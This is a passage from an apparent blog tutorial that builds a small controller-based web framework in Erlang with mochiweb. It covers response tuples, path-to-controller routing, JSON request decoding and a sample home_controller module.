  Req:respond({200, [{"Content-Type", "text/html"}], ""});
handle(_Path, Req) ->
  Req:respond({200, [{"Content-Type", "text/html"}],
               "<h3>Hello world</h3>"}).

Sweet! Digging a little deeper, we can see that any request that is not /favicon.ico responds with Hello world (also, notice the use of respond on the Req). The respond method takes a tuple that consists of:

{status, [{proplist_of, headers}], Body}
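For instance, a response tuple carrying JSON instead of HTML looks like this (the module name response_demo and the body are made up for illustration):

```erlang
% response_demo.erl -- builds a respond/1-style tuple in the
% {Status, Headers, Body} shape described above.
-module(response_demo).
-export([json_response/0]).

json_response() ->
  {200,
   [{"Content-Type", "application/json"}],
   "{\"status\": \"ok\"}"}.
```

Passing such a tuple to Req:respond/1 would send the JSON body back with a 200 status.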

So we can respond in different ways to different requests. Let's dig a little deeper and build out some controllers, an obvious enhancement. First, we'll modify our handle function:

handle(Path, Req) ->
  BaseController = lists:concat([top_level_request(clean_path(Path)), "_controller"]),
  CAtom = list_to_atom(BaseController),
  ControllerPath = parse_controller_path(clean_path(Path)),

  case CAtom of
    home ->
      IndexContents = ?ERROR_HTML("Uh oh"),
      Req:ok({"text/html", IndexContents});
    ControllerAtom ->
      Meth = clean_method(Req:get(method)),
      case Meth of
        get ->
          run_controller(Req, ControllerAtom, Meth, [ControllerPath]);
        _ ->
          run_controller(Req, ControllerAtom, Meth,
                         [ControllerPath, decode_data_from_request(Req)])
      end
  end.

% parse the controller path
parse_controller_path(CleanPath) ->
  case string:tokens(CleanPath, "/") of
    [] -> [];
    [_RootPath|Rest] -> Rest
  end.

% Call the controller action here
run_controller(Req, ControllerAtom, Meth, Args) ->
  case (catch erlang:apply(ControllerAtom, Meth, Args)) of
    {'EXIT', {undef, _}} ->
      Req:ok({"text/html", "Unimplemented: there is nothing to see here"});
    {'EXIT', E} ->
      Req:ok({"text/html", io_lib:format("Error: ~p", [E])});
    Body ->
      Req:ok({"text/html", Body})
  end.

% Other methods
% Get the data off the request
decode_data_from_request(Req) ->
  RecvBody = Req:recv_body(),
  Data = case RecvBody of
    <<>> -> erlang:list_to_binary("{}");
    Bin -> Bin
  end,
  {struct, Struct} = mochijson2:decode(Data),
  Struct.


top_level_request(Path) ->
  case string:tokens(Path, "/") of
    [CleanPath|_Others] -> CleanPath;
    [] -> "home"
  end.
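Putting the path helpers together, here is a tiny sketch (the module name routing_demo is hypothetical) of how a request path turns into a controller module name:

```erlang
% routing_demo.erl -- maps a path to a controller name using the
% same top-level-segment + "_controller" convention as above.
-module(routing_demo).
-export([controller_for/1]).

% First path segment, defaulting to "home" for the bare "/".
top_level_request(Path) ->
  case string:tokens(Path, "/") of
    [CleanPath|_Others] -> CleanPath;
    [] -> "home"
  end.

controller_for(Path) ->
  lists:concat([top_level_request(Path), "_controller"]).
```

So controller_for("/users/1") yields "users_controller", and the bare path "/" falls back to "home_controller".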

Now any path calls out to a controller of our choosing that responds to the four HTTP methods: get, put, post, and delete! To finish off, let's add a controller that responds with our hello world message:

-module (home_controller).
-export ([get/1, post/2, put/2, delete/2]).

get(_Path) -> "hello world".

post(_Path, _Data) -> "unhandled".
put(_Path, _Data) -> "unhandled".
delete(_Path, _Data) -> "unhandled".

Now we have a scalable little web framework written in erlang with mochiweb.

Thanks to damjan for pointing out the clean_path correction.